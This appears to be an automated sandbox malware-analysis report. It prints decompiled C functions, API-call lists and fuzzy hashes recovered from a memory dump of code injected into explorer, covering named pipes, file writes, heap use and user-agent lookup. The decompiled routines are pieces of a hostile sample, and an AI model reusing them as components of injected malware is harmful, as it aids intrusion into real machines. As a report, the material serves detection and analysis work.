Opcode Fuzzy Hash: 68c77f01e8c6780dfe701307dc001a3c2438e76daa96a70f931700e9baec779b
Instruction Fuzzy Hash: B13190B2914214AADB14F7A0CC55AEE7BECBF04310F040169FA85E7182EF749F448B65

Uniqueness

Uniqueness Score: -1.00%

Function 000831B5, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E000831B5(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xb0000
				_t10 = E0008C2D4( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E000885E5(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD52(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0008BCBC( &_v20, _t38); // executed
							_t18 = E000898CF(E00083294, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0x14df8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E000885FB( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}

0x000831b5
0x000831bb
0x000831cb
0x000831d0
0x000831d2
0x000831d7
0x000831e8
0x000831ed
0x000831f3
0x000831f5
0x000831fe
0x00083203
0x00083206
0x00083208
0x0008320a
0x0008320c
0x0008320d
0x0008320d
0x0008321a
0x0008321d
0x00083222
0x0008323c
0x00083242
0x00083247
0x0008324a
0x00083256
0x00083264
0x0008326b
0x0008326d
0x00000000
0x00000000
0x0008326f
0x0008327a
0x0008327d
0x00000000
0x0008324c
0x0008324c
0x00083252
0x0008327f
0x0008327f
0x00083280
0x00083286
0x00000000
0x0008328f
0x0008324a
0x000831f7
0x00000000
0x000831f7
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c576b98f02affbd08cae9e86b83f422ea5b3c0d59b1ee9b09956baf84b3634d1
Instruction ID: 59f2fc08bf385391679f841e88351b9e624e91d561e75ef301149a9f3ff63128
Opcode Fuzzy Hash: c576b98f02affbd08cae9e86b83f422ea5b3c0d59b1ee9b09956baf84b3634d1
Instruction Fuzzy Hash: 5D210A32604215AAEB50FBB8DC45FAE37A8FB95B74F20032AF565D71D1EE3489008751

Uniqueness

Uniqueness Score: -1.00%

Function 00085AF2, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085AF2(void* __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t16;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t32;
				void* _t38;
				signed int _t39;
				intOrPtr* _t40;
				void* _t46;

				_t46 = __fp0;
				_t38 = __edx;
				_t39 = 0;
				_t16 = E000885E5(0x14);
				_t32 =  *0x9e688; // 0xb0000
				_t40 = _t16;
				if( *((short*)(_t32 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t32 + 0x228));
					_v34 =  *((intOrPtr*)(_t32 + 0x22a));
					_v32 =  *((intOrPtr*)(_t32 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t40 = 2;
				 *(_t40 + 4) = _t39;
				_t17 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t40 + 8)) =  *((intOrPtr*)(_t17 + 0x224));
				_t18 = E00085A6E( *((intOrPtr*)(_t17 + 0x224)), _t38, _t46);
				 *((intOrPtr*)(_t40 + 0xc)) = _t18;
				if(_t18 == 0) {
					L4:
					if(E00082DBE() == 0) {
						goto L6;
					} else {
						_t39 = _t39 | 0xffffffff;
					}
				} else {
					_t38 = 0x3b;
					if(E0008A2AE(_t18, _t38) != 0) {
						L6:
						E00084D60(_t40, _t38, _t46);
					} else {
						goto L4;
					}
				}
				E0008A389();
				E0008A389();
				return _t39;
			}

0x00085af2
0x00085af2
0x00085afd
0x00085aff
0x00085b05
0x00085b0b
0x00085b15
0x00085b1e
0x00085b29
0x00085b34
0x00085b3a
0x00085b42
0x00085b42
0x00085b48
0x00085b4e
0x00085b51
0x00085b5c
0x00085b5f
0x00085b64
0x00085b69
0x00085b79
0x00085b80
0x00000000
0x00085b82
0x00085b82
0x00085b82
0x00085b6b
0x00085b6d
0x00085b77
0x00085b87
0x00085b89
0x00000000
0x00000000
0x00000000
0x00085b77
0x00085b91
0x00085b99
0x00085ba4

APIs

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

GetDriveTypeW.KERNELBASE(?), ref: 00085B42

Part of subcall function 00084D60: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DB3
Part of subcall function 00084D60: GetModuleHandleA.KERNEL32(00000000), ref: 00084DBA

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: HandleModule$AllocateDriveHeapType
String ID:
API String ID: 2730524069-0
Opcode ID: 4e94154b1fa7a0f125293cf44766616ac8f4c07a2ee2f84a873b248d873d53a6
Instruction ID: b263b5ef738ee49b6e2627f74b7bad9b19a94809a0dd4a7b32b746edd3f06e59
Opcode Fuzzy Hash: 4e94154b1fa7a0f125293cf44766616ac8f4c07a2ee2f84a873b248d873d53a6
Instruction Fuzzy Hash: E111CE386007019AD720BFB5EC09AEE73E8BF98764F04403AE895C7292FB35D946CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0008E492, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0008E492(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0x1460b08
				if( *_t5 == 0) {
					_v8 = E000895A8(0x2a7);
					 *0x9e788 = E00089187(_t6, 0);
					E000885A3( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E000885E5(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0x1460b08
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E000885FB(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x0008e495
0x0008e496
0x0008e49e
0x0008e4e8
0x0008e4f5
0x0008e4fa
0x00000000
0x0008e4a0
0x0008e4a5
0x0008e4ac
0x0008e4b5
0x0008e4bc
0x0008e4c3
0x0008e4c7
0x0008e4ff
0x0008e502
0x0008e4c9
0x0008e4db
0x0008e4db
0x0008e4c7

APIs

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E539), ref: 0008E4C3

Part of subcall function 000885FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088641

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: ce003176a90117f96ccf343a9758bf3ddaecc7f889a5e02c389bfdefc7767f45
Instruction ID: 62a3483ceea4aaf0a14076952cf910cecb7af1faa39926476d08b9ef5dd02165
Opcode Fuzzy Hash: ce003176a90117f96ccf343a9758bf3ddaecc7f889a5e02c389bfdefc7767f45
Instruction Fuzzy Hash: F3F0CD70608240FFFB48FBB8DC4AAA977E0FB40360F644229A151D32D2EEB49E009721

Uniqueness

Uniqueness Score: -1.00%

Function 0008A69E, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0008A69E(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x0008a69e
0x0008a6a1
0x0008a6a2
0x0008a6a5
0x0008a6a7
0x0008a6aa
0x0008a6af
0x0008a6e0
0x0008a6e2
0x0008a6b1
0x0008a6b1
0x0008a6b1
0x0008a6d3
0x00000000
0x00000000
0x0008a6d5
0x0008a6d8
0x0008a6de
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0008a6de
0x0008a6e7
0x0008a6e7
0x0008a6e3
0x0008a6e6

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F32,?), ref: 0008A6CB

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction ID: 3b3a24cdd749207699913458ac36c45aa91115effdf29cba6fb9c3bdeed8a2c2
Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction Fuzzy Hash: 08F01D72A10118BFEB10DF98C884BAA77ECFB05790F24456AB545E7104E670EE5097A1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A639, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A639(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x0008a643
0x0008a657
0x0008a65c
0x0008a665
0x0008a667
0x0008a671
0x0008a671
0x00000000
0x0008a677
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F1A), ref: 0008A654

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction ID: 65d9eedc006a2cfd8ac97b7fb51b928860c26b0144ef5deb2ecb816d2393883e
Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction Fuzzy Hash: EFE09AB2700114BEF76066689CC8F7B269CF7967F9F060332F691C31A0D6208C004371

Uniqueness

Uniqueness Score: -1.00%

Function 0008300A, Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008300A() {
				signed int _t4;
				intOrPtr _t8;
				void* _t11;

				_t4 =  *0x9e688; // 0xb0000
				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
					L3:
					return _t4 | 0xffffffff;
				} else {
					_t4 = E0008BB62(_t11);
					if(_t4 != 0) {
						goto L3;
					} else {
						AllocConsole();
						_t8 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t8 + 0x118))(E00082FEA, 1);
						return 0;
					}
				}
			}

0x0008300a
0x00083016
0x00083041
0x00083044
0x00083018
0x00083018
0x0008301f
0x00000000
0x00083021
0x00083026
0x0008302c
0x00083038
0x00083040
0x00083040
0x0008301f

APIs

AllocConsole.KERNEL32 ref: 00083026

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocConsole
String ID:
API String ID: 4167703944-0
Opcode ID: e7d2bc74a95cc982b844e6e220b71d1f6c0cc7485526e7d65bfdf34482e214c2
Instruction ID: baff1d1499d8a9b874f7f268805f1f364ab633432a9e72b64cd9cae1db522c61
Opcode Fuzzy Hash: e7d2bc74a95cc982b844e6e220b71d1f6c0cc7485526e7d65bfdf34482e214c2
Instruction Fuzzy Hash: 01E017342101018FEA04FB64CD5EBD433E0BB64B66F8605B0F654CA0B3D7B88D808B12

Uniqueness

Uniqueness Score: -1.00%

Function 0008A67D, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0008A67D(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x0008a691
0x0008a694
0x0008a699
0x0008a69d

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A70B,00000000,00000400,00000000,0008F8F7,0008F8F7,?,0008FA98,00000000), ref: 0008A691

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720

Uniqueness

Uniqueness Score: -1.00%

Function 000885E5, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000885E5(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}

0x000885f3
0x000885fa

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82

Uniqueness

Uniqueness Score: -1.00%

Function 0008B2AB, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008B2AB(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}

0x0008b2be

APIs

GetFileAttributesW.KERNELBASE(00000000,00084E6E), ref: 0008B2B1

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00

Uniqueness

Uniqueness Score: -1.00%

Function 000885D0, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000885D0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}

0x000885d9
0x000885df
0x000885e4

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00085F88), ref: 000885D9

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0008FA01, Relevance: 1.4, APIs: 1, Instructions: 117
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0008FA01(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t25;
				char _t26;
				intOrPtr _t28;
				void* _t30;
				void* _t35;
				char _t37;
				intOrPtr _t38;
				char _t41;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr* _t62;
				intOrPtr _t65;
				char* _t66;
				intOrPtr _t68;
				char _t77;
				void* _t80;
				void* _t81;

				_t25 =  *0x9e654; // 0x14dfd20
				_t26 = E000885E5( *((intOrPtr*)(_t25 + 4))); // executed
				_v12 = _t26;
				if(_t26 != 0) {
					_t62 =  *0x9e654; // 0x14dfd20
					if( *((intOrPtr*)(_t62 + 4)) > 0x400) {
						E000886C2(_t26,  *_t62, 0x400);
						_v8 = 0;
						_t35 = E0008109A(_t62, 0x34a);
						_t65 =  *0x9e688; // 0xb0000
						_t71 =  !=  ? 0x67d : 0x615;
						_t37 = E000895C2(_t65,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t35);
						_t66 = "\\";
						_v24 = _t37;
						_push(_t66);
						_push(_t37);
						_t38 =  *0x9e688; // 0xb0000
						_push(_t66);
						_v20 = E000892C6(_t38 + 0x1020);
						_t41 = E0008A6EB( &_v8, _t40,  &_v8); // executed
						_v16 = _t41;
						E000885B6( &_v24);
						E000885B6( &_v20);
						_t72 = _v16;
						_t81 = _t80 + 0x3c;
						_t68 = _v8;
						if(_v16 != 0 && _t68 > 0x400) {
							_t50 =  *0x9e654; // 0x14dfd20
							_t51 =  *((intOrPtr*)(_t50 + 4));
							_t52 =  <  ? _t68 : _t51;
							_t53 = ( <  ? _t68 : _t51) + 0xfffffc00;
							E000886C2(_v12 + 0x400, _t72 + 0x400, ( <  ? _t68 : _t51) + 0xfffffc00);
							_t68 = _v8;
							_t81 = _t81 + 0xc;
						}
						E000885FB( &_v16, _t68);
						E000885FB( &_v20, 0xfffffffe);
						_t26 = _v12;
						_t80 = _t81 + 0x10;
					}
					_t77 = 0;
					while(1) {
						_t28 =  *0x9e688; // 0xb0000
						_t30 = E0008A7BF(_t28 + 0x228, _t26, 0x1000); // executed
						_t80 = _t80 + 0xc;
						if(_t30 >= 0) {
							break;
						}
						Sleep(1);
						_t77 = _t77 + 1;
						if(_t77 < 0x2710) {
							_t26 = _v12;
							continue;
						}
						break;
					}
					E000885FB( &_v12, 0); // executed
				}
				return 0;
			}

0x0008fa07
0x0008fa0f
0x0008fa14
0x0008fa1a
0x0008fa20
0x0008fa33
0x0008fa3d
0x0008fa47
0x0008fa4a
0x0008fa4f
0x0008fa65
0x0008fa69
0x0008fa6e
0x0008fa6f
0x0008fa70
0x0008fa75
0x0008fa78
0x0008fa79
0x0008fa7a
0x0008fa7f
0x0008fa8e
0x0008fa93
0x0008fa98
0x0008fa9f
0x0008faa8
0x0008faad
0x0008fab0
0x0008fab3
0x0008fab8
0x0008fabe
0x0008fac3
0x0008fac8
0x0008facb
0x0008fade
0x0008fae3
0x0008fae6
0x0008fae6
0x0008faee
0x0008faf9
0x0008fafe
0x0008fb01
0x0008fb01
0x0008fb04
0x0008fb06
0x0008fb0c
0x0008fb17
0x0008fb1c
0x0008fb21
0x00000000
0x00000000
0x0008fb2a
0x0008fb30
0x0008fb37
0x0008fb39
0x00000000
0x0008fb39
0x00000000
0x0008fb37
0x0008fb43
0x0008fb4c
0x0008fb50

APIs

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8F7,?,?,?,0008FCF1,00000000), ref: 0008FB2A

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: 14cea8ed7d9e81ff3059c6482662edfdaae721d4d07a1e8a1d5efdd78e210c6e
Instruction ID: 171361de703645103d6c8e367bb5da180907a659175838bdfb3d2b3c7c862fc3
Opcode Fuzzy Hash: 14cea8ed7d9e81ff3059c6482662edfdaae721d4d07a1e8a1d5efdd78e210c6e
Instruction Fuzzy Hash: 72317C71A00205ABEB00FBA8CD86EEE77BDFB44314B54417AF545E7242EB34EE018B51

Uniqueness

Uniqueness Score: -1.00%

Function 00088950, Relevance: 1.4, APIs: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00088950(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E000885E5(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E000885E5(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887CB(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E000885FB( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0x14df8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E000885FB(_t73, 0);
						}
						E000885FB( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6EB(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E000887F6(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0x14df8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E000885FB( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}

0x00088956
0x0008895d
0x0008895f
0x00088967
0x00088969
0x00088971
0x00088973
0x00088976
0x00088979
0x0008898d
0x00088994
0x0008899a
0x000889a3
0x000889fb
0x00088a00
0x00088a09
0x00088a56
0x00088a59
0x00088a61
0x00088a65
0x00088a65
0x00088a6a
0x00000000
0x00088a6a
0x00088a0b
0x00088a0d
0x00088a15
0x00088a1b
0x00088a1c
0x00088a1c
0x00088a24
0x00088a27
0x00088a2c
0x00088a2c
0x00088a2f
0x00088a38
0x00088a3d
0x00088a43
0x00088a4a
0x00000000
0x00088a50
0x000889ac
0x000889b1
0x000889b3
0x000889ba
0x00000000
0x00000000
0x000889cf
0x00000000
0x000889d1
0x000889d1
0x000889dc
0x000889df
0x000889ec
0x00000000
0x000889f2
0x000889cf
0x0008897b
0x00000000

APIs

Part of subcall function 000885E5: RtlAllocateHeap.NTDLL(00000008,?,?,00088F65,00000100,?,00085FAC), ref: 000885F3

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 0008899A

Memory Dump Source

Source File: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
API String ID: 680773602-0
Opcode ID: c92bae0116b7f6883b826651830f3acc6ed41771aa308b88c8d160800e0c3441
Instruction ID: 25cf5ab49ef49d1d8ac82ab7d8b45c06ea666a1c9442a33dc88490f98d363920
Opcode Fuzzy Hash: c92bae0116b7f6883b826651830f3acc6ed41771aa308b88c8d160800e0c3441
Instruction Fuzzy Hash: 12318576A04705AFEB24EB68DC41B9E77E8FF40760FA4841AF68597181DF30AA018759

Uniqueness

Uniqueness Score: -1.00%

Function 0008E308, Relevance: 1.3, APIs: 1, Instructions: 92
sleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0008E308(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x9e6b4; // 0x14dfa98, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x9e6b4; // 0x14dfa98
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x9e68c; // 0x14dfab8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E000885E5(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x9e68c; // 0x14dfab8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E000848F8(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}

0x0008e308
0x0008e31b
0x0008e322
0x0008e32b
0x0008e333
0x0008e339
0x0008e33e
0x0008e349
0x0008e34e
0x0008e3e7
0x0008e3e7
0x0008e3ef
0x00000000
0x0008e3f4
0x0008e355
0x0008e358
0x0008e35f
